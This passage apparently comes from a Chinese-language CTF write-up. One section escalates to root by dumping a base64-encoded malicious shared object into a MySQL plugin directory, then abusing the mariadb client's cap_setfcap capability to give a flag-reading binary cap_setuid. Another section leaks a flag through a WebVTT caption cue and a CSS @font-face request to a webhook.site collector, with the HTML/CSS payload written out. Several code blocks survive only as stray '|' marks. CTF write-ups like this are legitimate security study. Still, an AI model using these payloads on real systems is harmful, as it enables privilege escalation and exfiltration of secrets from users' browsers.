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') into dumpfile '/mysql/plugin/xxxx.so';INSTALL PLUGIN testx SONAME 'xxxx.so';
|
|
根据提示 find / -exec getcap {} ; 2>/dev/null 发现
mariadb 客户端有 cap_setfcap
/usr/bin/mariadb cap_setfcap=ep
那么首先写 readflag
|
|
再写一个调用 cap_set_file 给 readflag 挂上 cap_setuid=ep
之后用 mariadb 加载恶意 so, mariadb –plugin-dir=/mysql/plugin/ –default-auth=setcap
|
|
然后 readflag 就可以提权到 root + 读 flag 了
ytiruces
Sovled by: hpdoger, ucasz, crumbledwall, z3ratu1
使用文本格式的vtt字幕文件,来leak相关的flag信息。
https://developer.mozilla.org/en-US/docs/Web/API/WebVTT_API#styling_webvtt_cues
以下作为简单的测试:
/static/1.vtt
WEBVTT
00:00.000-->00:04.000
<v n1ctf{testdd5}
payload:
<video controls autoplay muted src="https://interactive-examples.mdn.mozilla.net/media/cc0-videos/friday.mp4">
<track default kind="captions" srclang="en" src="/static/1.vtt" />
</video>hhh<style>
@font-face {
font-family: "fz";
src: url(https://webhook.site/xxxxxx/?q=z);
}
video {
width: 250px;
}
video::cue(v[voice^="n1"]) {
font-size: 1rem;
font-family: fz;
color: red;
}
</style>
发现可以收到回显,于是根据上述代码稍微改改,写个脚本+手动即可挨个leak出flag信息:
|
|